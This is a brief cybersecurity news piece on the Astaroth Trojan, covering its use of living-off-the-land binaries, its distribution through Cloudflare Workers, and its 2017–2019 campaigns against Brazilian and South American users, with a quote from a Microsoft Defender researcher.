Astaroth Trojan is notorious in the world of cybersecurity for using living off the land binaries (LOLbins) to remain undetected. In the latest Astaroth campaign, the Trojan is distributed through the Cloudflare Workers serverless computing platform to evade antivirus software.
How is the attack launched?
Astaroth’s operators use Cloudflare Workers as a part of their three-step infection process.
Evolution of Astaroth Trojan
The Astaroth Trojan is believed to be active since late 2017. It evolved its campaign in 2018 to exclusively target South American users.
In Astaroth’s February 2019 campaign, the attackers focused on stealing credentials from Brazilian users. They injected a malicious module in the antivirus software Avast to extract information about the target systems.
Microsoft discovered another Astaroth campaign during the months of May and June in 2019. Andrea Lelli, from Microsoft Defender ATP Research, says, “Abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”